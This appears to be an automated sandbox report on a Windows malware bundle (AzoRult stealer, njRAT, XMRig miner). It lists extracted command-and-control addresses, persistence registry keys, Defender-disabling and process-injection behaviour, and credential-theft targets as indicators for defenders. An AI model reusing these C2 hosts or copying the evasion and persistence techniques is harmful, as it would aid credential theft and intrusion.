azorult | 6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929

Analysis

max time kernel
141s
max time network
155s
platform
windows10_x64
resource
win10-en-20211208
submitted
08-01-2022 11:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e11fa56349781d01080d0baba6367758.exe
Size

24.0MB
MD5

e11fa56349781d01080d0baba6367758
SHA1

6214bdca82fa0e54a75de181fd1ed95dffdaf35a
SHA256

6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929
SHA512

1e99d322bb33346db00d9ba4ac0a6deb19830b02d3d4f98aee5461b2bbf99d02831b1079daed9d44307c261084a6864a4242a352aa12590b265941002de65f64

Score

10^/10

azorult njrat xmrig hacked collection discovery evasion infostealer miner persistence spyware stealer trojan

Malware Config

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

172.94.18.243:3001

Mutex

79402713f13d898b624bf5785b7dd5e5

Attributes

reg_key
79402713f13d898b624bf5785b7dd5e5
splitter
|'|'|

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE	disable_win_def
C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE	disable_win_def
behavioral2/memory/416-138-0x0000000000690000-0x0000000000698000-memory.dmp	disable_win_def
behavioral2/memory/416-139-0x0000000000690000-0x0000000000698000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 600 created 3568 600 WerFault.exe DllHost.exe
PID 3748 created 4980 3748 WerFault.exe nslookup.exe

description	pid	process	target process
PID 600 created 3568	600	WerFault.exe	DllHost.exe
PID 3748 created 4980	3748	WerFault.exe	nslookup.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

powershell.EXEsvchost.exe

description	pid	process	target process
PID 2684 created 564	2684	powershell.EXE	winlogon.exe
PID 2116 created 3568	2116	svchost.exe	DllHost.exe
PID 2116 created 3380	2116	svchost.exe	DllHost.exe
PID 2116 created 3568	2116	svchost.exe	DllHost.exe
PID 2116 created 4980	2116	svchost.exe	nslookup.exe

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4980-1355-0x0000000140310068-mapping.dmp	xmrig

Executes dropped EXE 13 IoCs

Processes:

CHROME UPDATE.EXECHROME.EXEGOOGLE CHROME.EXENOTEPAD.EXESVCHOST.EXEWINDOWS UPDATE.EXEWINDOWS.EXEserver.exesihost64.exeservicesupdate.exeservices.exesihost64.exesihost64.exe

pid	process
2680	CHROME UPDATE.EXE
2760	CHROME.EXE
2624	GOOGLE CHROME.EXE
1368	NOTEPAD.EXE
2836	SVCHOST.EXE
584	WINDOWS UPDATE.EXE
416	WINDOWS.EXE
3652	server.exe
3656	sihost64.exe
1020	servicesupdate.exe
4424	services.exe
4296	sihost64.exe
2360	sihost64.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 4 IoCs

Processes:

SVCHOST.EXEserver.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVCHOST.EXE	SVCHOST.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVCHOST.EXE	SVCHOST.EXE
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79402713f13d898b624bf5785b7dd5e5.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79402713f13d898b624bf5785b7dd5e5.exe	server.exe

Loads dropped DLL 6 IoCs

Processes:

GOOGLE CHROME.EXE

pid process

2624 GOOGLE CHROME.EXE
2624 GOOGLE CHROME.EXE
2624 GOOGLE CHROME.EXE
2624 GOOGLE CHROME.EXE
2624 GOOGLE CHROME.EXE
2624 GOOGLE CHROME.EXE
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2624	GOOGLE CHROME.EXE
2624	GOOGLE CHROME.EXE
2624	GOOGLE CHROME.EXE
2624	GOOGLE CHROME.EXE
2624	GOOGLE CHROME.EXE
2624	GOOGLE CHROME.EXE

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	GOOGLE CHROME.EXE
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	GOOGLE CHROME.EXE
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	GOOGLE CHROME.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

server.exeNOTEPAD.EXESVCHOST.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\79402713f13d898b624bf5785b7dd5e5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\79402713f13d898b624bf5785b7dd5e5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\Services.exe"	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Store = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SVCHOST.EXE"	SVCHOST.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Skype Web = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SVCHOST.EXE"	SVCHOST.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 32 IoCs

Processes:

svchost.exeWMIADAP.EXEpowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\814CB6F3D92C7FE85DF73576F3F2785E	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File created	C:\Windows\system32\perfc009.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc00A.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh00A.dat	WMIADAP.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File created	C:\Windows\system32\perfh007.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh011.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfc007.dat	WMIADAP.EXE
File created	C:\Windows\system32\PerfStringBackup.TMP	WMIADAP.EXE
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	WMIADAP.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_E724097EF7BBA8B1CB3228AA4D2ED312	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EA618097E393409AFA316F0F87E2C202_9F844D680B50027B439CD59D52F84F16	svchost.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	WMIADAP.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149	svchost.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WMIADAP.EXE
File created	C:\Windows\system32\perfc00C.dat	WMIADAP.EXE
File created	C:\Windows\system32\perfh00C.dat	WMIADAP.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\perfc011.dat	WMIADAP.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\229169D96B9C20761B929D428962A0A2_E1B17CAB62C1FF675B22B2FC5D3FEABF	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1401C7EC8E96BC79CBFD92F9DF762D_E35D496D1CD0B884BEBCAFED0FE61600	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\perfh009.dat	WMIADAP.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

CHROME.EXEpowershell.EXEservices.exe

description	pid	process	target process
PID 2760 set thread context of 1508	2760	CHROME.EXE	nslookup.exe
PID 2684 set thread context of 1972	2684	powershell.EXE	dllhost.exe
PID 4424 set thread context of 4980	4424	services.exe	nslookup.exe

Drops file in Windows directory 7 IoCs

Processes:

nslookup.exeWMIADAP.EXE

description	ioc	process
File created	C:\Windows\Tasks\nslooksvc32.job	nslookup.exe
File opened for modification	C:\Windows\Tasks\nslooksvc32.job	nslookup.exe
File created	C:\Windows\Tasks\nslooksvc64.job	nslookup.exe
File opened for modification	C:\Windows\Tasks\nslooksvc64.job	nslookup.exe
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.h	WMIADAP.EXE
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.ini	WMIADAP.EXE
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.ini	WMIADAP.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2584	3380	WerFault.exe	DllHost.exe
1012	3568	WerFault.exe	DllHost.exe
600	3568	WerFault.exe	DllHost.exe
3748	4980	WerFault.exe	nslookup.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GOOGLE CHROME.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GOOGLE CHROME.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

692 schtasks.exe
4480 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4176 timeout.exe

pid	process
692	schtasks.exe
4480	schtasks.exe

pid	process
4176	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

SVCHOST.EXE

pid process

2836 SVCHOST.EXE

pid	process
2836	SVCHOST.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeNOTEPAD.EXEpowershell.exepowershell.exeGOOGLE CHROME.EXEpowershell.exepowershell.exepowershell.exeConhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1368	NOTEPAD.EXE
1552	powershell.exe
1632	powershell.exe
2624	GOOGLE CHROME.EXE
2624	GOOGLE CHROME.EXE
2320	powershell.exe
2928	powershell.exe
1840	powershell.exe
3664	Conhost.exe
2192	powershell.exe
1368	NOTEPAD.EXE
1632	powershell.exe
3028	powershell.exe
1516	powershell.exe
1516	powershell.exe
1552	powershell.exe
1552	powershell.exe
340	powershell.exe
1460	powershell.exe
1460	powershell.exe
2320	powershell.exe
2320	powershell.exe
2928	powershell.exe
2928	powershell.exe
2168	powershell.exe
2168	powershell.exe
1632	powershell.exe
1632	powershell.exe
1840	powershell.exe
1840	powershell.exe
3664	Conhost.exe
3664	Conhost.exe
1552	powershell.exe
2192	powershell.exe
2192	powershell.exe
3028	powershell.exe
3028	powershell.exe
1516	powershell.exe
2320	powershell.exe
2928	powershell.exe
340	powershell.exe
340	powershell.exe
1840	powershell.exe
3664	Conhost.exe
1460	powershell.exe
2168	powershell.exe
2192	powershell.exe
3028	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeNOTEPAD.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeConhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeserver.exe

description	pid	process
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	1368	NOTEPAD.EXE
Token: SeIncreaseQuotaPrivilege	4072	powershell.exe
Token: SeSecurityPrivilege	4072	powershell.exe
Token: SeTakeOwnershipPrivilege	4072	powershell.exe
Token: SeLoadDriverPrivilege	4072	powershell.exe
Token: SeSystemProfilePrivilege	4072	powershell.exe
Token: SeSystemtimePrivilege	4072	powershell.exe
Token: SeProfSingleProcessPrivilege	4072	powershell.exe
Token: SeIncBasePriorityPrivilege	4072	powershell.exe
Token: SeCreatePagefilePrivilege	4072	powershell.exe
Token: SeBackupPrivilege	4072	powershell.exe
Token: SeRestorePrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeSystemEnvironmentPrivilege	4072	powershell.exe
Token: SeRemoteShutdownPrivilege	4072	powershell.exe
Token: SeUndockPrivilege	4072	powershell.exe
Token: SeManageVolumePrivilege	4072	powershell.exe
Token: 33	4072	powershell.exe
Token: 34	4072	powershell.exe
Token: 35	4072	powershell.exe
Token: 36	4072	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	3664	Conhost.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeIncreaseQuotaPrivilege	1632	powershell.exe
Token: SeSecurityPrivilege	1632	powershell.exe
Token: SeTakeOwnershipPrivilege	1632	powershell.exe
Token: SeLoadDriverPrivilege	1632	powershell.exe
Token: SeSystemProfilePrivilege	1632	powershell.exe
Token: SeSystemtimePrivilege	1632	powershell.exe
Token: SeProfSingleProcessPrivilege	1632	powershell.exe
Token: SeIncBasePriorityPrivilege	1632	powershell.exe
Token: SeCreatePagefilePrivilege	1632	powershell.exe
Token: SeBackupPrivilege	1632	powershell.exe
Token: SeRestorePrivilege	1632	powershell.exe
Token: SeShutdownPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeSystemEnvironmentPrivilege	1632	powershell.exe
Token: SeRemoteShutdownPrivilege	1632	powershell.exe
Token: SeUndockPrivilege	1632	powershell.exe
Token: SeManageVolumePrivilege	1632	powershell.exe
Token: 33	1632	powershell.exe
Token: 34	1632	powershell.exe
Token: 35	1632	powershell.exe
Token: 36	1632	powershell.exe
Token: SeDebugPrivilege	3652	server.exe
Token: SeIncreaseQuotaPrivilege	1552	powershell.exe
Token: SeSecurityPrivilege	1552	powershell.exe
Token: SeTakeOwnershipPrivilege	1552	powershell.exe
Token: SeLoadDriverPrivilege	1552	powershell.exe
Token: SeSystemProfilePrivilege	1552	powershell.exe
Token: SeSystemtimePrivilege	1552	powershell.exe
Token: SeProfSingleProcessPrivilege	1552	powershell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

dwm.exe

pid process

964 dwm.exe
964 dwm.exe
964 dwm.exe
964 dwm.exe
964 dwm.exe
964 dwm.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

OfficeClickToRun.exe

pid process

2532 OfficeClickToRun.exe

pid	process
964	dwm.exe
964	dwm.exe
964	dwm.exe
964	dwm.exe
964	dwm.exe
964	dwm.exe

pid	process
2532	OfficeClickToRun.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e11fa56349781d01080d0baba6367758.exeWINDOWS.EXEWINDOWS UPDATE.EXEGOOGLE CHROME.EXENOTEPAD.EXEcmd.exeserver.exeCHROME UPDATE.EXECHROME.EXEcmd.execmd.exe

description	pid	process	target process
PID 2696 wrote to memory of 2680	2696	e11fa56349781d01080d0baba6367758.exe	CHROME UPDATE.EXE
PID 2696 wrote to memory of 2680	2696	e11fa56349781d01080d0baba6367758.exe	CHROME UPDATE.EXE
PID 2696 wrote to memory of 2760	2696	e11fa56349781d01080d0baba6367758.exe	CHROME.EXE
PID 2696 wrote to memory of 2760	2696	e11fa56349781d01080d0baba6367758.exe	CHROME.EXE
PID 2696 wrote to memory of 2624	2696	e11fa56349781d01080d0baba6367758.exe	GOOGLE CHROME.EXE
PID 2696 wrote to memory of 2624	2696	e11fa56349781d01080d0baba6367758.exe	GOOGLE CHROME.EXE
PID 2696 wrote to memory of 2624	2696	e11fa56349781d01080d0baba6367758.exe	GOOGLE CHROME.EXE
PID 2696 wrote to memory of 1368	2696	e11fa56349781d01080d0baba6367758.exe	NOTEPAD.EXE
PID 2696 wrote to memory of 1368	2696	e11fa56349781d01080d0baba6367758.exe	NOTEPAD.EXE
PID 2696 wrote to memory of 2836	2696	e11fa56349781d01080d0baba6367758.exe	SVCHOST.EXE
PID 2696 wrote to memory of 2836	2696	e11fa56349781d01080d0baba6367758.exe	SVCHOST.EXE
PID 2696 wrote to memory of 2836	2696	e11fa56349781d01080d0baba6367758.exe	SVCHOST.EXE
PID 2696 wrote to memory of 584	2696	e11fa56349781d01080d0baba6367758.exe	WINDOWS UPDATE.EXE
PID 2696 wrote to memory of 584	2696	e11fa56349781d01080d0baba6367758.exe	WINDOWS UPDATE.EXE
PID 2696 wrote to memory of 584	2696	e11fa56349781d01080d0baba6367758.exe	WINDOWS UPDATE.EXE
